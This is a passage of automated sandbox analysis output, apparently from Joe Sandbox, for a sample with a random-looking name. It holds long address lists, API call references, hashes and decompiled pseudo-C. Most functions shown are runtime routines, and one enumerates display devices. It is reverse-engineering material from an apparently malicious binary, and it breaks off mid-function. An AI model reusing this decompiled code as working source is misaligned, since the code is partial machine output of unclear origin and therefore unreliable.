                                                                                                                                      0x013189cc
                                                                                                                                      0x013189d3
                                                                                                                                      0x013189eb
                                                                                                                                      0x013189eb
                                                                                                                                      0x013189ee
                                                                                                                                      0x013189d5
                                                                                                                                      0x013189d5
                                                                                                                                      0x013189dc
                                                                                                                                      0x00000000
                                                                                                                                      0x013189de
                                                                                                                                      0x013189e0
                                                                                                                                      0x013189e6
                                                                                                                                      0x013189e6
                                                                                                                                      0x013189dc
                                                                                                                                      0x013189f6
                                                                                                                                      0x01318a12
                                                                                                                                      0x01318a22
                                                                                                                                      0x01318a19
                                                                                                                                      0x01318a1b
                                                                                                                                      0x01318a1b
                                                                                                                                      0x01318a40
                                                                                                                                      0x01318a52
                                                                                                                                      0x01318a47
                                                                                                                                      0x01318a4a
                                                                                                                                      0x01318a4a
                                                                                                                                      0x01318a40
                                                                                                                                      0x01318a5c
                                                                                                                                      0x01318a66
                                                                                                                                      0x01318a6b
                                                                                                                                      0x01318a70
                                                                                                                                      0x01318a77
                                                                                                                                      0x01318a77
                                                                                                                                      0x01318974
                                                                                                                                      0x01318962

                                                                                                                                      APIs
                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01326484), ref: 01318992
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0132F494,000000FF,00000000,0000003F,00000000,?,?), ref: 01318A0A
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0132F4E8,000000FF,?,0000003F,00000000,?), ref: 01318A37
                                                                                                                                      • _free.LIBCMT ref: 01318980
                                                                                                                                        • Part of subcall function 01314615: HeapFree.KERNEL32(00000000,00000000,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?), ref: 0131462B
                                                                                                                                        • Part of subcall function 01314615: GetLastError.KERNEL32(?,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?,?), ref: 0131463D
                                                                                                                                      • _free.LIBCMT ref: 01318B4C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1286116820-0
                                                                                                                                      • Opcode ID: 27e3173ef3cd3e5255f82cf96fd5d015cf12ddb09a0605c8c7c1319046e2e46e
                                                                                                                                      • Instruction ID: 49786db7e30bb687c1af68ec3a5cd56a065085e74cfc2616d60d9c2afa30a0d8
                                                                                                                                      • Opcode Fuzzy Hash: 27e3173ef3cd3e5255f82cf96fd5d015cf12ddb09a0605c8c7c1319046e2e46e
                                                                                                                                      • Instruction Fuzzy Hash: 0651F872900219ABDB38EF7DDC818AABBBDEF45318F1042AEE555A7298D7309940CB54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                      			E013132F6(signed int* __ecx, signed int __edx) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				intOrPtr* _v12;
                                                                                                                                      				signed int _v16;
                                                                                                                                      				signed int _t28;
                                                                                                                                      				signed int _t29;
                                                                                                                                      				intOrPtr _t33;
                                                                                                                                      				signed int _t37;
                                                                                                                                      				signed int _t38;
                                                                                                                                      				signed int _t40;
                                                                                                                                      				void* _t50;
                                                                                                                                      				signed int _t56;
                                                                                                                                      				intOrPtr* _t57;
                                                                                                                                      				signed int _t68;
                                                                                                                                      				signed int _t71;
                                                                                                                                      				signed int _t72;
                                                                                                                                      				signed int _t74;
                                                                                                                                      				signed int _t75;
                                                                                                                                      				signed int _t78;
                                                                                                                                      				signed int _t80;
                                                                                                                                      				signed int* _t81;
                                                                                                                                      				signed int _t85;
                                                                                                                                      				void* _t86;
                                                                                                                                      
                                                                                                                                      				_t72 = __edx;
                                                                                                                                      				_v12 = __ecx;
                                                                                                                                      				_t28 =  *__ecx;
                                                                                                                                      				_t81 =  *_t28;
                                                                                                                                      				if(_t81 != 0) {
                                                                                                                                      					_t29 =  *0x132e00c; // 0x17120af4
                                                                                                                                      					_t56 =  *_t81 ^ _t29;
                                                                                                                                      					_t78 = _t81[1] ^ _t29;
                                                                                                                                      					_t83 = _t81[2] ^ _t29;
                                                                                                                                      					asm("ror edi, cl");
                                                                                                                                      					asm("ror esi, cl");
                                                                                                                                      					asm("ror ebx, cl");
                                                                                                                                      					if(_t78 != _t83) {
                                                                                                                                      						L14:
                                                                                                                                      						 *_t78 = E01312667( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                                                                                                                      						_t33 = E01309701(_t56);
                                                                                                                                      						_t57 = _v12;
                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E01309701(_t78 + 4);
                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E01309701(_t83);
                                                                                                                                      						_t37 = 0;
                                                                                                                                      						L15:
                                                                                                                                      						return _t37;
                                                                                                                                      					}
                                                                                                                                      					_t38 = 0x200;
                                                                                                                                      					_t85 = _t83 - _t56 >> 2;
                                                                                                                                      					if(_t85 <= 0x200) {
                                                                                                                                      						_t38 = _t85;
                                                                                                                                      					}
                                                                                                                                      					_t80 = _t38 + _t85;
                                                                                                                                      					if(_t80 == 0) {
                                                                                                                                      						_t80 = 0x20;
                                                                                                                                      					}
                                                                                                                                      					if(_t80 < _t85) {
                                                                                                                                      						L9:
                                                                                                                                      						_push(4);
                                                                                                                                      						_t80 = _t85 + 4;
                                                                                                                                      						_push(_t80);
                                                                                                                                      						_v8 = E0131A0F4(_t56);
                                                                                                                                      						_t40 = E01314615(0);
                                                                                                                                      						_t68 = _v8;
                                                                                                                                      						_t86 = _t86 + 0x10;
                                                                                                                                      						if(_t68 != 0) {
                                                                                                                                      							goto L11;
                                                                                                                                      						}
                                                                                                                                      						_t37 = _t40 | 0xffffffff;
                                                                                                                                      						goto L15;
                                                                                                                                      					} else {
                                                                                                                                      						_push(4);
                                                                                                                                      						_push(_t80);
                                                                                                                                      						_v8 = E0131A0F4(_t56);
                                                                                                                                      						E01314615(0);
                                                                                                                                      						_t68 = _v8;
                                                                                                                                      						_t86 = _t86 + 0x10;
                                                                                                                                      						if(_t68 != 0) {
                                                                                                                                      							L11:
                                                                                                                                      							_t56 = _t68;
                                                                                                                                      							_v8 = _t68 + _t85 * 4;
                                                                                                                                      							_t83 = _t68 + _t80 * 4;
                                                                                                                                      							_t78 = _v8;
                                                                                                                                      							_push(0x20);
                                                                                                                                      							asm("ror eax, cl");
                                                                                                                                      							_t71 = _t78;
                                                                                                                                      							_v16 = 0 ^  *0x132e00c;
                                                                                                                                      							asm("sbb edx, edx");
                                                                                                                                      							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                                                                                                                      							_v8 = _t74;
                                                                                                                                      							if(_t74 == 0) {
                                                                                                                                      								goto L14;
                                                                                                                                      							}
                                                                                                                                      							_t75 = _v16;
                                                                                                                                      							_t50 = 0;
                                                                                                                                      							do {
                                                                                                                                      								_t50 = _t50 + 1;
                                                                                                                                      								 *_t71 = _t75;
                                                                                                                                      								_t71 = _t71 + 4;
                                                                                                                                      							} while (_t50 != _v8);
                                                                                                                                      							goto L14;
                                                                                                                                      						}
                                                                                                                                      						goto L9;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return _t28 | 0xffffffff;
                                                                                                                                      			}

























                                                                                                                                      0x013132f6
                                                                                                                                      0x01313300
                                                                                                                                      0x01313304
                                                                                                                                      0x01313306
                                                                                                                                      0x0131330a
                                                                                                                                      0x01313314
                                                                                                                                      0x01313325
                                                                                                                                      0x0131332a
                                                                                                                                      0x0131332c
                                                                                                                                      0x0131332e
                                                                                                                                      0x01313330
                                                                                                                                      0x01313332
                                                                                                                                      0x01313336
                                                                                                                                      0x013133f0
                                                                                                                                      0x013133fe
                                                                                                                                      0x01313400
                                                                                                                                      0x01313405
                                                                                                                                      0x0131340c
                                                                                                                                      0x0131341c
                                                                                                                                      0x0131342b
                                                                                                                                      0x0131342e
                                                                                                                                      0x01313430
                                                                                                                                      0x00000000
                                                                                                                                      0x01313431
                                                                                                                                      0x0131333e
                                                                                                                                      0x01313343
                                                                                                                                      0x01313348
                                                                                                                                      0x0131334a
                                                                                                                                      0x0131334a
                                                                                                                                      0x0131334c
                                                                                                                                      0x01313351
                                                                                                                                      0x01313355
                                                                                                                                      0x01313355
                                                                                                                                      0x01313358
                                                                                                                                      0x01313377
                                                                                                                                      0x01313377
                                                                                                                                      0x01313379
                                                                                                                                      0x0131337c
                                                                                                                                      0x01313385
                                                                                                                                      0x01313388
                                                                                                                                      0x0131338d
                                                                                                                                      0x01313390
                                                                                                                                      0x01313395
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313397
                                                                                                                                      0x00000000
                                                                                                                                      0x0131335a
                                                                                                                                      0x0131335a
                                                                                                                                      0x0131335c
                                                                                                                                      0x01313365
                                                                                                                                      0x01313368
                                                                                                                                      0x0131336d
                                                                                                                                      0x01313370
                                                                                                                                      0x01313375
                                                                                                                                      0x0131339f
                                                                                                                                      0x013133a2
                                                                                                                                      0x013133a4
                                                                                                                                      0x013133a7
                                                                                                                                      0x013133af
                                                                                                                                      0x013133b5
                                                                                                                                      0x013133bc
                                                                                                                                      0x013133be
                                                                                                                                      0x013133c6
                                                                                                                                      0x013133d5
                                                                                                                                      0x013133d9
                                                                                                                                      0x013133db
                                                                                                                                      0x013133de
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013133e0
                                                                                                                                      0x013133e3
                                                                                                                                      0x013133e5
                                                                                                                                      0x013133e5
                                                                                                                                      0x013133e6
                                                                                                                                      0x013133e8
                                                                                                                                      0x013133eb
                                                                                                                                      0x00000000
                                                                                                                                      0x013133e5
                                                                                                                                      0x00000000
                                                                                                                                      0x01313375
                                                                                                                                      0x01313358
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                      • Opcode ID: 7f31e9bf9243067bb251d87fcb18a5049ca881b6e04e0fd87283b98577cae518
                                                                                                                                      • Instruction ID: 1c3dfc4328d75ce9da133ba2bcfbbd93492e94039266b9f47084772258045f0f
                                                                                                                                      • Opcode Fuzzy Hash: 7f31e9bf9243067bb251d87fcb18a5049ca881b6e04e0fd87283b98577cae518
                                                                                                                                      • Instruction Fuzzy Hash: D141C136A00204DFCB29DF7CC880A5EB7A5FF84728F554969D915EB385DB31E901CB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 61%
                                                                                                                                      			E01306414(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t41;
                                                                                                                                      				long _t50;
                                                                                                                                      				long _t51;
                                                                                                                                      				intOrPtr _t53;
                                                                                                                                      				void* _t65;
                                                                                                                                      				intOrPtr _t68;
                                                                                                                                      				void* _t70;
                                                                                                                                      
                                                                                                                                      				_t63 = __edx;
                                                                                                                                      				_t53 = __ecx;
                                                                                                                                      				E01323174(E01323688, __edx, __eflags);
                                                                                                                                      				_t68 = _t53;
                                                                                                                                      				 *((intOrPtr*)(_t70 - 0x20)) = _t68;
                                                                                                                                      				 *(_t70 - 0x18) =  *(_t70 - 0x18) & 0x00000000;
                                                                                                                                      				E01302801(_t53);
                                                                                                                                      				 *(_t70 - 4) = 0;
                                                                                                                                      				_t50 = 0;
                                                                                                                                      				 *(_t70 - 0x18) = 1;
                                                                                                                                      				 *(_t70 - 0x39c) = 0x348;
                                                                                                                                      				 *((intOrPtr*)(_t70 - 0x14)) = 0;
                                                                                                                                      				EnumDisplayMonitors(0, 0, E01306529, 0);
                                                                                                                                      				_t65 = EnumDisplayDevicesW;
                                                                                                                                      				_push(0);
                                                                                                                                      				_push(_t70 - 0x39c);
                                                                                                                                      				_push(0);
                                                                                                                                      				_push(0);
                                                                                                                                      				while(EnumDisplayDevicesW() != 0) {
                                                                                                                                      					 *(_t70 - 0x6e4) = 0x348;
                                                                                                                                      					 *(_t70 - 0x1c) = 0;
                                                                                                                                      					__eflags = EnumDisplayDevicesW(_t70 - 0x398, 0, _t70 - 0x6e4, 0);
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						_t51 =  *(_t70 - 0x1c);
                                                                                                                                      						do {
                                                                                                                                      							_t63 = E013027E1(_t70 - 0x50, _t63, _t70 - 0x6a0);
                                                                                                                                      							 *(_t70 - 4) = 1;
                                                                                                                                      							_t41 = E013031AE(_t70 - 0x38, _t40, _t65, "\n");
                                                                                                                                      							 *(_t70 - 4) = 2;
                                                                                                                                      							E0130271E(_t68, _t65, _t68, __eflags, _t41);
                                                                                                                                      							E01302755(_t70 - 0x38, _t40, __eflags);
                                                                                                                                      							 *(_t70 - 4) = 0;
                                                                                                                                      							E01302755(_t70 - 0x50, _t40, __eflags);
                                                                                                                                      							_t51 = _t51 + 1;
                                                                                                                                      							__eflags = EnumDisplayDevicesW(_t70 - 0x398, _t51, _t70 - 0x6e4, 0);
                                                                                                                                      						} while (__eflags != 0);
                                                                                                                                      						_t50 =  *((intOrPtr*)(_t70 - 0x14));
                                                                                                                                      					}
                                                                                                                                      					_push(0);
                                                                                                                                      					_t50 = _t50 + 1;
                                                                                                                                      					__eflags = _t50;
                                                                                                                                      					_push(_t70 - 0x39c);
                                                                                                                                      					_push(_t50);
                                                                                                                                      					 *((intOrPtr*)(_t70 - 0x14)) = _t50;
                                                                                                                                      					_push(0);
                                                                                                                                      				}
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
                                                                                                                                      				return _t68;
                                                                                                                                      			}












                                                                                                                                      0x01306414
                                                                                                                                      0x01306414
                                                                                                                                      0x01306419
                                                                                                                                      0x01306426
                                                                                                                                      0x01306428
                                                                                                                                      0x0130642b
                                                                                                                                      0x01306430
                                                                                                                                      0x0130643e
                                                                                                                                      0x01306441
                                                                                                                                      0x01306444
                                                                                                                                      0x0130644b
                                                                                                                                      0x01306455
                                                                                                                                      0x01306458
                                                                                                                                      0x0130645e
                                                                                                                                      0x0130646c
                                                                                                                                      0x0130646d
                                                                                                                                      0x0130646e
                                                                                                                                      0x0130646f
                                                                                                                                      0x0130650e
                                                                                                                                      0x01306477
                                                                                                                                      0x01306488
                                                                                                                                      0x01306496
                                                                                                                                      0x01306498
                                                                                                                                      0x0130649a
                                                                                                                                      0x0130649d
                                                                                                                                      0x013064b1
                                                                                                                                      0x013064b3
                                                                                                                                      0x013064bd
                                                                                                                                      0x013064c6
                                                                                                                                      0x013064ca
                                                                                                                                      0x013064d2
                                                                                                                                      0x013064da
                                                                                                                                      0x013064de
                                                                                                                                      0x013064eb
                                                                                                                                      0x013064f7
                                                                                                                                      0x013064f7
                                                                                                                                      0x013064fb
                                                                                                                                      0x013064fb
                                                                                                                                      0x013064fe
                                                                                                                                      0x01306506
                                                                                                                                      0x01306506
                                                                                                                                      0x01306507
                                                                                                                                      0x01306508
                                                                                                                                      0x01306509
                                                                                                                                      0x0130650c
                                                                                                                                      0x0130650c
                                                                                                                                      0x0130651f
                                                                                                                                      0x01306528

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01306419
                                                                                                                                      • EnumDisplayMonitors.USER32(00000000,00000000,01306529,00000000), ref: 01306458
                                                                                                                                      • EnumDisplayDevicesW.USER32(?,00000000,00000348,00000000), ref: 01306494
                                                                                                                                      • EnumDisplayDevicesW.USER32(?,?,00000348,00000000), ref: 013064F5
                                                                                                                                      • EnumDisplayDevicesW.USER32(00000000,00000000,00000348,00000000), ref: 0130650E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DisplayEnum$Devices$H_prologMonitors
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4145787477-0
                                                                                                                                      • Opcode ID: 8af4de094115c48e2426da3af6caf33c4e057ededef2ed6b2c712d2b7cc470e2
                                                                                                                                      • Instruction ID: bd65f7a8ec212baf381eed4038b0a833e7704247e9e760572c4b4fad7d4b58b6
                                                                                                                                      • Opcode Fuzzy Hash: 8af4de094115c48e2426da3af6caf33c4e057ededef2ed6b2c712d2b7cc470e2
                                                                                                                                      • Instruction Fuzzy Hash: 2D3112B1910219AFEB15DB98DC95FFEB7FCEB58704F10005AE505E2284EBB45E458B60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                      			E01319979() {
                                                                                                                                      				int _v8;
                                                                                                                                      				void* __ecx;
                                                                                                                                      				void* _t6;
                                                                                                                                      				int _t7;
                                                                                                                                      				char* _t13;
                                                                                                                                      				int _t17;
                                                                                                                                      				void* _t19;
                                                                                                                                      				char* _t25;
                                                                                                                                      				WCHAR* _t27;
                                                                                                                                      
                                                                                                                                      				_t27 = GetEnvironmentStringsW();
                                                                                                                                      				if(_t27 == 0) {
                                                                                                                                      					L7:
                                                                                                                                      					_t13 = 0;
                                                                                                                                      				} else {
                                                                                                                                      					_t6 = E01319942(_t27);
                                                                                                                                      					_pop(_t19);
                                                                                                                                      					_t17 = _t6 - _t27 >> 1;
                                                                                                                                      					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                                                                                                      					_v8 = _t7;
                                                                                                                                      					if(_t7 == 0) {
                                                                                                                                      						goto L7;
                                                                                                                                      					} else {
                                                                                                                                      						_t25 = E013151CD(_t19, _t7);
                                                                                                                                      						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                                                                                                      							_t13 = 0;
                                                                                                                                      						} else {
                                                                                                                                      							_t13 = _t25;
                                                                                                                                      							_t25 = 0;
                                                                                                                                      						}
                                                                                                                                      						E01314615(_t25);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				if(_t27 != 0) {
                                                                                                                                      					FreeEnvironmentStringsW(_t27);
                                                                                                                                      				}
                                                                                                                                      				return _t13;
                                                                                                                                      			}












                                                                                                                                      0x01319988
                                                                                                                                      0x0131998e
                                                                                                                                      0x013199e6
                                                                                                                                      0x013199e6
                                                                                                                                      0x01319990
                                                                                                                                      0x01319991
                                                                                                                                      0x01319996
                                                                                                                                      0x0131999f
                                                                                                                                      0x013199a5
                                                                                                                                      0x013199ab
                                                                                                                                      0x013199b0
                                                                                                                                      0x00000000
                                                                                                                                      0x013199b2
                                                                                                                                      0x013199b8
                                                                                                                                      0x013199bd
                                                                                                                                      0x013199db
                                                                                                                                      0x013199d5
                                                                                                                                      0x013199d5
                                                                                                                                      0x013199d7
                                                                                                                                      0x013199d7
                                                                                                                                      0x013199de
                                                                                                                                      0x013199e3
                                                                                                                                      0x013199b0
                                                                                                                                      0x013199ea
                                                                                                                                      0x013199ed
                                                                                                                                      0x013199ed
                                                                                                                                      0x013199fb

                                                                                                                                      APIs
                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 01319982
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 013199A5
                                                                                                                                        • Part of subcall function 013151CD: RtlAllocateHeap.NTDLL(00000000,0130969E,00000000,?,0130C747,00000002,00000000,?,?,?,013095B7,0130969E,00000004,00000000,00000000,00000000), ref: 013151FF
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013199CB
                                                                                                                                      • _free.LIBCMT ref: 013199DE
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 013199ED
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                      • Opcode ID: 73e3d204015270a1812f263315ac757b113454a39347a78703501db206a053fc
                                                                                                                                      • Instruction ID: 7e1c8f478a7ff07c02791a5e9e747b95b4da9831a26481c5a2635bb37334b2be
                                                                                                                                      • Opcode Fuzzy Hash: 73e3d204015270a1812f263315ac757b113454a39347a78703501db206a053fc
                                                                                                                                      • Instruction Fuzzy Hash: A60184766016167FE7352AAF6C98D7F6D6EDAC2AED314012DFA04C710CDA648D0187B0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                      			E01314493(void* __ecx) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				intOrPtr _t2;
                                                                                                                                      				void* _t4;
                                                                                                                                      				void* _t10;
                                                                                                                                      				void* _t11;
                                                                                                                                      				void* _t13;
                                                                                                                                      				void* _t15;
                                                                                                                                      				long _t16;
                                                                                                                                      
                                                                                                                                      				_t11 = __ecx;
                                                                                                                                      				_t16 = GetLastError();
                                                                                                                                      				_t10 = 0;
                                                                                                                                      				_t2 =  *0x132e11c; // 0x6
                                                                                                                                      				_t19 = _t2 - 0xffffffff;
                                                                                                                                      				if(_t2 == 0xffffffff) {
                                                                                                                                      					L2:
                                                                                                                                      					_t15 = E013145B8(_t11, 1, 0x364);
                                                                                                                                      					_pop(_t13);
                                                                                                                                      					if(_t15 != 0) {
                                                                                                                                      						_t4 = E01314944(_t13, _t16, __eflags,  *0x132e11c, _t15);
                                                                                                                                      						__eflags = _t4;
                                                                                                                                      						if(_t4 != 0) {
                                                                                                                                      							E01314281(_t13, _t15, 0x132f048);
                                                                                                                                      							E01314615(_t10);
                                                                                                                                      							__eflags = _t15;
                                                                                                                                      							if(_t15 != 0) {
                                                                                                                                      								goto L9;
                                                                                                                                      							} else {
                                                                                                                                      								goto L8;
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							_push(_t15);
                                                                                                                                      							goto L4;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t10);
                                                                                                                                      						L4:
                                                                                                                                      						E01314615();
                                                                                                                                      						L8:
                                                                                                                                      						SetLastError(_t16);
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t15 = E013148EE(_t11, _t16, _t19, _t2);
                                                                                                                                      					if(_t15 != 0) {
                                                                                                                                      						L9:
                                                                                                                                      						SetLastError(_t16);
                                                                                                                                      						_t10 = _t15;
                                                                                                                                      					} else {
                                                                                                                                      						goto L2;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return _t10;
                                                                                                                                      			}











                                                                                                                                      0x01314493
                                                                                                                                      0x0131449e
                                                                                                                                      0x013144a0
                                                                                                                                      0x013144a2
                                                                                                                                      0x013144a7
                                                                                                                                      0x013144aa
                                                                                                                                      0x013144b8
                                                                                                                                      0x013144c4
                                                                                                                                      0x013144c7
                                                                                                                                      0x013144ca
                                                                                                                                      0x013144dc
                                                                                                                                      0x013144e1
                                                                                                                                      0x013144e3
                                                                                                                                      0x013144ee
                                                                                                                                      0x013144f4
                                                                                                                                      0x013144fc
                                                                                                                                      0x013144fe
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013144e5
                                                                                                                                      0x013144e5
                                                                                                                                      0x00000000
                                                                                                                                      0x013144e5
                                                                                                                                      0x013144cc
                                                                                                                                      0x013144cc
                                                                                                                                      0x013144cd
                                                                                                                                      0x013144cd
                                                                                                                                      0x01314500
                                                                                                                                      0x01314501
                                                                                                                                      0x01314501
                                                                                                                                      0x013144ac
                                                                                                                                      0x013144b2
                                                                                                                                      0x013144b6
                                                                                                                                      0x01314509
                                                                                                                                      0x0131450a
                                                                                                                                      0x01314510
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013144b6
                                                                                                                                      0x01314517

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(0130969E,0130969E,00000002,01313CD6,01315210,00000000,?,0130C747,00000002,00000000,?,?,?,013095B7,0130969E,00000004), ref: 01314498
                                                                                                                                      • _free.LIBCMT ref: 013144CD
                                                                                                                                      • _free.LIBCMT ref: 013144F4
                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0130969E), ref: 01314501
                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0130969E), ref: 0131450A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                      • Opcode ID: 737e26b9aec5940af3e7f344709ce06bb426bf03e6b5bbf49a792f406cb17cbb
                                                                                                                                      • Instruction ID: b292e44b3392f169680a535c3981b0698228b43ae0cb4ed283137212b3869ca0
                                                                                                                                      • Opcode Fuzzy Hash: 737e26b9aec5940af3e7f344709ce06bb426bf03e6b5bbf49a792f406cb17cbb
                                                                                                                                      • Instruction Fuzzy Hash: D501A97A240601A7D73E367C6C45D6B25AD9BD177DB35412DF415B358DFF6484024260
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0131AAF9(intOrPtr* _a4) {
                                                                                                                                      				intOrPtr _t6;
                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                      				void* _t23;
                                                                                                                                      				void* _t24;
                                                                                                                                      				void* _t25;
                                                                                                                                      				void* _t26;
                                                                                                                                      				void* _t27;
                                                                                                                                      
                                                                                                                                      				_t21 = _a4;
                                                                                                                                      				if(_t21 != 0) {
